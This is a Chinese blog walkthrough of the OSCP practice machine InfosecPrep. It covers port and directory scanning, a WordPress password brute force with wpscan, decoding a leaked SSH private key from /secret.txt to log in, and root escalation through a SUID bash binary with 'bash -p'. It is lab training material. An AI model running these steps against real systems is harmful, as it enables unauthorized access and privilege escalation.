OSCP系列靶场-Esay-InfosecPrep

admin 2024年10月7日15:50:30评论8 views字数 4264阅读14分12秒阅读模式

获网安教程

免费&进群

OSCP系列靶场-Esay-InfosecPrep  
OSCP系列靶场-Esay-InfosecPrep

本文由掌控安全学院 - 杳若投稿

总结

getwebshell → 通过目录扫描得到robots.txt端点 → robots.txt存在敏感目录 → 访问敏感目录得到base64加密信息 → 解密得到ssh密钥 → 信息收集得到用户名 → 免密ssh登录

提 权 思 路 → 内网信息收集 → suid-bash直接提权

准备工作

  • 启动VPN
    获取攻击机IP → 192.168.45.206

OSCP系列靶场-Esay-InfosecPrep

  • 启动靶机
    获取目标机器IP → 192.168.152.89

OSCP系列靶场-Esay-InfosecPrep

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

  1. sudo nmap --min-rate 10000-p-192.168.152.89

  2. PORT STATE SERVICE

  3. 22/tcp open ssh

  4. 80/tcp open http

  5. 33060/tcp open mysqlx

OSCP系列靶场-Esay-InfosecPrep

开放的端口-→22,80,33060

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80,33060192.168.152.89

  3. PORT STATE SERVICE VERSION

  4. 22/tcp open ssh OpenSSH8.2p1Ubuntu4ubuntu0.1(Ubuntu

  5. 80/tcp open http Apache httpd 2.4.41((Ubuntu))

OSCP系列靶场-Esay-InfosecPrep

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 8.2p1 Ubuntu 4ubuntu0.1

  1. # 搜索对应脚本

  2. msf6 searchsploit OpenSSH8.2p1

无相关漏洞详情

OSCP系列靶场-Esay-InfosecPrep

22-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

  1. ssh root @192.168.152.89-v

显示publickey就是只支持密钥登录

OSCP系列靶场-Esay-InfosecPrep

80-HTTP端口的信息收集

访问 http://192.168.152.89:80 像一个cms进行指纹搜集
OSCP系列靶场-Esay-InfosecPrep

信息收集-网站指纹

  1. whatweb http://192.168.152.89:80

版本号也报了出来,优先尝试通用漏洞 WordPress 5.4.2

OSCP系列靶场-Esay-InfosecPrep

漏洞利用-网站指纹

  1. searchsploit WordPress5.4.2

发现需要插件

OSCP系列靶场-Esay-InfosecPrep

信息收集-漏洞扫描wpscan

因为cms的原因,针对wordpress的专用扫描器

  1. # -e枚举 ap枚举插件 u枚举用户名 t枚举主题

  2. wpscan --url http://192.168.152.89:80 --enumerate ap,u,t

通过爆破发现了用户名admin

OSCP系列靶场-Esay-InfosecPrep
发现一些没什么大危害的漏洞

OSCP系列靶场-Esay-InfosecPrep

  1. # 暴力破解admin密码

  2. wpscan --url http://192.168.152.89:80 -U admin -P /usr/share/wordlists/rockyou.txt

这边挂着我们去研究其他内容

OSCP系列靶场-Esay-InfosecPrep

信息收集-HTML隐藏信息查看

  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.152.89:80

无隐藏信息

OSCP系列靶场-Esay-InfosecPrep

信息收集-目录扫描

信息收集-目录扫描初步
  1. dirsearch -u http://192.168.152.89:80 -x 302,403

OSCP系列靶场-Esay-InfosecPrep
因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-目录访问

/robots.txt端点

访问后得到了一个新的端点/secret.txt

/secret.txt端点

得到了一串代码,带 == 推测是base64

OSCP系列靶场-Esay-InfosecPrep

base64解密
  1. curl http://192.168.152.89:80/secret.txt | base64 -d

解密之后发现是私钥

OSCP系列靶场-Esay-InfosecPrep

  1. curl http://192.168.152.89:80/secret.txt | base64 -d → is_rsa

将其保存成一个文件is_rsa方便后续利用

OSCP系列靶场-Esay-InfosecPrep

其他端点

另外端点是wp的端点,因为发现了私钥,所以先待定

33060端口的信息收集

nmap探测知道是一个mysqlxmysql数据库应该有一定的关联
不过从80端口我们已经获取了进入的key,就不探究33060端口了

漏洞利用-getwebshell

利用root连接私钥(失败)

获取了ssh免密登录的私钥后以为是root的,我飘了

  1. sudo ssh -i is_rsa root @192.168.152.89-p22

root用户不能私钥登录

OSCP系列靶场-Esay-InfosecPrep

利用admin连接私钥(失败)

想到了wpscan收集到的admin用户

  1. sudo ssh -i is_rsa admin @192.168.152.89-p22

也不行 G!

OSCP系列靶场-Esay-InfosecPrep

爆破用户名(好像没有这工具)

我以为可以用hyrda在已知私钥的情况下爆破用户名,好像没这个命令。

遗漏的信息收集

我傻了,网站官方上写明了

  1. Oh yea!Almost forgot the only user on this box isoscp”.

唯一的用户是oscp

OSCP系列靶场-Esay-InfosecPrep

可以尝试利用oscp进行爆破

ssh私钥登录

  1. sudo ssh -i is_rsa oscp @192.168.152.89-p22

ohhhh 能进去但是我权限开大了

OSCP系列靶场-Esay-InfosecPrep

  1. chmod 600 is_rsa

  2. sudo ssh -i is_rsa oscp @192.168.152.89-p22

OSCP系列靶场-Esay-InfosecPrep

内网遨游-getshell

FLAG1获取

  1. -bash-5.0$ find /-name local.txt 2→/dev/null

  2. /home/oscp/local.txt

  3. -bash-5.0$ cat /home/oscp/local.txt

  4. 10c23c2c5f69e180a3970f10b2a236ef

OSCP系列靶场-Esay-InfosecPrep

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权

  1. # 确定发行版本

  2. -bash-5.0$ lsb_release -a

  3. No LSB modules are available.

  4. Distributor ID:Ubuntu

  5. Description:Ubuntu20.04 LTS

  6. Release:20.04

  7. Codename: focal

发行版本为Ubuntu 20.04,不太能overlayfs提权

OSCP系列靶场-Esay-InfosecPrep

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权

  1. -bash-5.0$ uname -a

  2. Linux oscp 5.4.0-40-generic#44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

内核版本为5.4.0

列举出所有的sudo文件

查找具有sudo权限,且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

  1. # 利用sudo -l寻找

  2. sudo -l

发现需要密码

OSCP系列靶场-Esay-InfosecPrep

列举出所有suid文件

如果发现u=s有东西的话 访问 https://gtfobins.github.io 寻找

  1. # -perm 文件权限

  2. find /-perm -u=s -type f 2→/dev/null

  3. /snap/core18/1754/bin/umount

  4. /snap/core18/1754/usr/bin/chfn

  5. /snap/core18/1754/usr/bin/chsh

  6. /snap/core18/1754/usr/bin/gpasswd

  7. /snap/core18/1754/usr/bin/newgrp

  8. /snap/core18/1754/usr/bin/passwd

  9. /snap/core18/1754/usr/bin/sudo

  10. /snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper

  11. /snap/core18/1754/usr/lib/openssh/ssh-keysign

  12. /usr/lib/dbus-1.0/dbus-daemon-launch-helper

  13. /usr/lib/snapd/snap-confine

  14. /usr/lib/eject/dmcrypt-get-device

  15. /usr/lib/policykit-1/polkit-agent-helper-1

  16. /usr/lib/openssh/ssh-keysign

  17. /usr/bin/gpasswd

  18. /usr/bin/mount

  19. /usr/bin/fusermount

  20. /usr/bin/passwd

  21. /usr/bin/newgrp

  22. /usr/bin/at

  23. /usr/bin/sudo

  24. /usr/bin/chfn

  25. /usr/bin/bash

  26. /usr/bin/pkexec

  27. /usr/bin/umount

  28. /usr/bin/chsh

  29. /usr/bin/su

虽然多,重点关注/usr目录下发现了bash直接会心一笑

OSCP系列靶场-Esay-InfosecPrep

权限提升

bash权限提升

OSCP系列靶场-Esay-InfosecPrep
通过查找使用上述命令将直接提权

以下命令将以root身份打开一个bash shell。

  1. bash -p

  2. bash-3.2# id

  3. uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

OSCP系列靶场-Esay-InfosecPrep
提权成功

FLAG2获取

  1. bash-5.0# cat /root/proof.txt

  2. abb2ed5f2c5147f3881508eaade611db

完结撒花~

OSCP系列靶场-Esay-InfosecPrep

反思

当我通关提权了,wpscan还在扫描,应该用cewl生成字典较好,不然太多了

OSCP系列靶场-Esay-InfosecPrep

以后应该把网站上的信息收集加入进来

密钥可以再次base64,密钥的格式为

  1. -----BEGIN OPENSSH PRIVATE KEY-----

  2. 内容

  3. -----END OPENSSH PRIVATE KEY-----

  1. # 针对内容再次base64解密也可以得到用户名

  2. cat test.txt | baes64 -d

OSCP系列靶场-Esay-InfosecPrep

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

OSCP系列靶场-Esay-InfosecPrep

没看够~?欢迎关注!

分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

OSCP系列靶场-Esay-InfosecPrep

分享后扫码加我

回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

OSCP系列靶场-Esay-InfosecPrep

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日15:50:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP系列靶场-Esay-InfosecPrephttps://cn-sec.com/archives/1972565.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息